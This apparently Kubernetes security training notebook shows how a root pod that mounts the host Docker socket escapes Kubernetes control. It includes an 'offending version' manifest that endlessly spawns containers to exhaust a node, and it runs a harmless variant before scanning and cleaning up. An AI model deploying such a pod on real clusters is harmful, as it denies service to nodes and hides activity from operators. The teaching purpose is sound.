**This notebook covered by the following [license](License.ipynb)  This note must not be removed**

# Cloudbomb


## Purpose

It is shown, how dangerous it is 

* to start an image from an untrusted source
* with __root privileges__
* and __access to the host file system__

This examples destroys the cluster step by step. 

It is a dangerous example, turned _s l o w_ for didactic purposes.

It can even be made more disruptive easily.

Don't put images like this into public registries.


#### Create an empty directory and change into

In [1]:
mkdir -p cloudbomb
cd cloudbomb

In [2]:
pwd

/minikube-host/notebooks/training-kubernetes-security/cloudbomb


#### Get Docker

See the latest statically linked versions here
https://download.docker.com/linux/static/stable/x86_64/

In [3]:
curl https://download.docker.com/linux/static/stable/x86_64/docker-19.03.8.tgz -o docker.tgz

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 60.7M  100 60.7M    0     0  7726k      0  0:00:08  0:00:08 --:--:-- 8382k


In [4]:
tar tzf docker.tgz

docker/
docker/containerd
docker/docker
docker/ctr
docker/dockerd
docker/runc
docker/docker-proxy
docker/docker-init
docker/containerd-shim


In [5]:
pwd

/minikube-host/notebooks/training-kubernetes-security/cloudbomb


In [5]:
tar xzf docker.tgz

In [8]:
ls -alF docker

total 206076
drwxrwxr-x 2 docker 1000     4096 Mar 11  2020 ./
drwxr-xr-x 3   1001 1001     4096 Nov 30 15:09 ../
-rwxr-xr-x 1 docker 1000 34667000 Mar 11  2020 containerd*
-rwxr-xr-x 1 docker 1000  6120256 Mar 11  2020 containerd-shim*
-rwxr-xr-x 1 docker 1000 18874936 Mar 11  2020 ctr*
-rwxr-xr-x 1 docker 1000 65830626 Mar 11  2020 docker*
-rwxr-xr-x 1 docker 1000   764144 Mar 11  2020 docker-init*
-rwxr-xr-x 1 docker 1000  2877369 Mar 11  2020 docker-proxy*
-rwxr-xr-x 1 docker 1000 72235448 Mar 11  2020 dockerd*
-rwxr-xr-x 1 docker 1000  9628672 Mar 11  2020 runc*


### Create the Dockerfile

and build the image **inside minikube**

In [9]:
cat > Dockerfile <<EOF
FROM alpine

COPY docker/docker /usr/bin

CMD ["docker", "ps"]
EOF
cat Dockerfile

FROM alpine

COPY docker/docker /usr/bin

CMD ["docker", "ps"]


In [10]:
docker images

REPOSITORY                                TAG       IMAGE ID       CREATED        SIZE
harden                                    latest    3def72f39e23   19 hours ago   8.69MB
<none>                                    <none>    c2d8b6685fbf   19 hours ago   31.9MB
nginx                                     latest    f652ca386ed1   13 days ago    141MB
nginx                                     alpine    b46db85084b8   4 weeks ago    23.2MB
k8s.gcr.io/kube-apiserver                 v1.22.2   e64579b7d886   3 months ago   128MB
k8s.gcr.io/kube-controller-manager        v1.22.2   5425bcbd23c5   3 months ago   122MB
k8s.gcr.io/kube-proxy                     v1.22.2   873127efbc8a   3 months ago   104MB
k8s.gcr.io/kube-scheduler                 v1.22.2   b51ddc1014b0   3 months ago   52.7MB
kubernetesui/dashboard                    v2.3.1    e1482a24335a   6 months ago   220MB
k8s.gcr.io/etcd                           3.5.0-0   004811815584   6 months ago   295MB
aquasec/kube-bench           

In [11]:
docker build . -t cloudbomb

Sending build context to Docker daemon  274.7MB
Step 1/3 : FROM alpine
latest: Pulling from library/alpine

Digest: sha256:21a3deaa0d32a8057914f36584b5288d2e5ecc984380bc0118285c70fa8c9300
Status: Downloaded newer image for alpine:latest
 ---> c059bfaa849c
Step 2/3 : COPY docker/docker /usr/bin
 ---> c6fdbfaf3fe5
Step 3/3 : CMD ["docker", "ps"]
 ---> Running in baeb88aded83
Removing intermediate container baeb88aded83
 ---> 722e09838634
Successfully built 722e09838634
Successfully tagged cloudbomb:latest


#### Check the images

`grep -E ... ` is only for colouring 

In [12]:
docker images | grep --color=always -E '$|cloudbomb.*$' 

REPOSITORY                                TAG       IMAGE ID       CREATED         SIZE
cloudbomb                                 latest    722e09838634   8 seconds ago   71.4MB
harden                                    latest    3def72f39e23   19 hours ago    8.69MB
<none>                                    <none>    c2d8b6685fbf   19 hours ago    31.9MB
nginx                                     latest    f652ca386ed1   13 days ago     141MB
alpine                                    latest    c059bfaa849c   2 weeks ago     5.59MB
nginx                                     alpine    b46db85084b8   4 weeks ago     23.2MB
k8s.gcr.io/kube-apiserver                 v1.22.2   e64579b7d886   3 months ago    128MB
k8s.gcr.io/kube-controller-manager        v1.22.2   5425bcbd23c5   3 months ago    122MB
k8s.gcr.io/kube-proxy                     v1.22.2   873127efbc8a   3 months ago    104MB
k8s.gcr.io/kube-scheduler                 v1.22.2   b51ddc1014b0   3 months ago    52.7MB
kubernetesui/das

## Create the Cloudbomb Pod

* it is mounting the Docker socket `/var/run/docker.sock` into the container, we have `hostPath` rights
* the `docker` process is running as `root`
* **Gotcha**

# Offending version, don't use

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: cloudbomb 
spec:
  containers:
  - image: cloudbomb
    imagePullPolicy: IfNotPresent
    command:
      - /bin/sh
      - "-c" 
      - "while true; \
           do \   
             docker run -d --name BOOM_\$(cat /dev/urandom | \
             tr -cd 'a-f0-9' | \
             head -c 6) nginx ; \
             sleep 10 ; \
           done"
    name: cloudbomb
    volumeMounts:
    - mountPath: /var/run/docker.sock
      name: docker-socket
  volumes:
  - name: docker-socket
    hostPath:
      path: /var/run/docker.sock
      type: Socket
```

# Soft version

In [13]:
kubectl create -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: cloudbomb 
spec:
  containers:
  - image: cloudbomb
    imagePullPolicy: IfNotPresent
    command:
      - /bin/sh
      - "-c" 
      - "while true; \
           do \   
             docker ps ; \
             sleep 10 ; \
           done"
    name: cloudbomb
    volumeMounts:
    - mountPath: /var/run/docker.sock
      name: docker-socket
  volumes:
  - name: docker-socket
    hostPath:
      path: /var/run/docker.sock
      type: Socket
EOF

pod/cloudbomb created


In [14]:
kubectl get pods

NAME                        READY   STATUS      RESTARTS   AGE
cloudbomb                   1/1     Running     0          4s
kube-bench--1-vl2h9         0/1     Completed   0          75m
my-nginx-5b56ccd65f-5tbgs   1/1     Running     0          21h
my-nginx-5b56ccd65f-7br4l   1/1     Running     0          23h
my-nginx-5b56ccd65f-lrbr4   1/1     Running     0          23h
my-nginx-5b56ccd65f-nxbdq   1/1     Running     0          23h
my-nginx-5b56ccd65f-p5k7h   1/1     Running     0          23h


In [14]:
kubectl wait --for=condition=ready --timeout=10s pod/cloudbomb

pod/cloudbomb condition met


In [15]:
kubectl get pods

NAME                            READY   STATUS    RESTARTS   AGE
cloudbomb                       1/1     Running   0          6s
nginx-strict-5cdc48cf55-f5r5l   1/1     Running   0          3h45m
nginx-strict-5cdc48cf55-v72v5   1/1     Running   0          3h45m
nginx-strict-5cdc48cf55-xkh98   1/1     Running   0          3h45m


In [15]:
kubectl logs cloudbomb

CONTAINER ID        IMAGE                  COMMAND                  CREATED             STATUS                  PORTS               NAMES
d5a3bff8013d        722e09838634           "/bin/sh -c 'while t…"   1 second ago        Up Less than a second                       k8s_cloudbomb_cloudbomb_default_1bc941a0-c93b-4f0c-ba5d-ff5ab56a313b_0
0b15b60438ab        k8s.gcr.io/pause:3.5   "/pause"                 1 second ago        Up Less than a second                       k8s_POD_cloudbomb_default_1bc941a0-c93b-4f0c-ba5d-ff5ab56a313b_0
9fb441f4472b        harden                 "/usr/sbin/nginx -g …"   19 hours ago        Up 19 hours                                 harden
658daf1a9ae5        nginx                  "/docker-entrypoint.…"   21 hours ago        Up 21 hours                                 k8s_my-nginx_my-nginx-5b56ccd65f-5tbgs_default_1ad19392-eb5c-4df9-aa54-efd0ecfe0e2c_0
18ea1f6cc811        k8s.gcr.io/pause:3.5   "/pause"                 21 hours ago        Up 21 hours      

# Docker is 💩, let us use `cri-o`

Doesn' solve the principle problem

## Docker vs Kubernetes

The docker command bypasses Kubernetes. It is *not* visible to the `kubelet` and the `api-server`

It will kill the node _s l o w l y_

In [ ]:
docker ps | grep -E '$|.*BOOM.*$'

## Kube-Scan

Examine the pod with [Octarine Kube-Scan](https://github.com/octarinesec/kube-scan)

Open a separate terminal window and run `minikube tunnel` in this terminal

In [16]:
kubectl apply -f https://raw.githubusercontent.com/octarinesec/kube-scan/master/kube-scan.yaml

namespace/kube-scan created
configmap/kube-scan created
serviceaccount/kube-scan created
clusterrole.rbac.authorization.k8s.io/kube-scan created
clusterrolebinding.rbac.authorization.k8s.io/kube-scan created
deployment.apps/kube-scan created
service/kube-scan-ui created


In [18]:
kubectl wait -n kube-scan --for=condition=available deployment/kube-scan

error: timed out waiting for the condition on deployments/kube-scan


: 1

In [14]:
kubectl apply -f https://raw.githubusercontent.com/octarinesec/kube-scan/master/kube-scan-lb.yaml

namespace/kube-scan unchanged
configmap/kube-scan unchanged
serviceaccount/kube-scan unchanged
clusterrole.rbac.authorization.k8s.io/kube-scan configured
clusterrolebinding.rbac.authorization.k8s.io/kube-scan configured
deployment.apps/kube-scan unchanged
service/kube-scan-ui configured


In [16]:
echo http://$(kubectl -n kube-scan get service kube-scan-ui -o jsonpath={..ip})

http://10.96.201.143


# Risk Score

Current 5, should be 8-9 

I own the node, no network access

# Cleanup

In [20]:
kubectl delete pod cloudbomb

pod "cloudbomb" deleted


In [21]:
kubectl delete -f https://raw.githubusercontent.com/octarinesec/kube-scan/master/kube-scan.yaml -f https://raw.githubusercontent.com/octarinesec/kube-scan/master/kube-scan-lb.yaml

namespace "kube-scan" deleted
configmap "kube-scan" deleted
serviceaccount "kube-scan" deleted
clusterrole.rbac.authorization.k8s.io "kube-scan" deleted
clusterrolebinding.rbac.authorization.k8s.io "kube-scan" deleted
deployment.apps "kube-scan" deleted
service "kube-scan-ui" deleted
namespace "kube-scan" deleted
Error from server (NotFound): error when deleting "https://raw.githubusercontent.com/octarinesec/kube-scan/master/kube-scan-lb.yaml": configmaps "kube-scan" not found
Error from server (NotFound): error when deleting "https://raw.githubusercontent.com/octarinesec/kube-scan/master/kube-scan-lb.yaml": serviceaccounts "kube-scan" not found
Error from server (NotFound): error when deleting "https://raw.githubusercontent.com/octarinesec/kube-scan/master/kube-scan-lb.yaml": deployments.apps "kube-scan" not found
Error from server (NotFound): error when deleting "https://raw.githubusercontent.com/octarinesec/kube-scan/master/kube-scan-lb.yaml": services "kube-scan-ui" not found
[unab

: 1

# Pedestrians approach

In [25]:
kubectl get pods cloudbomb -o yaml | grep hostPath

  - hostPath:
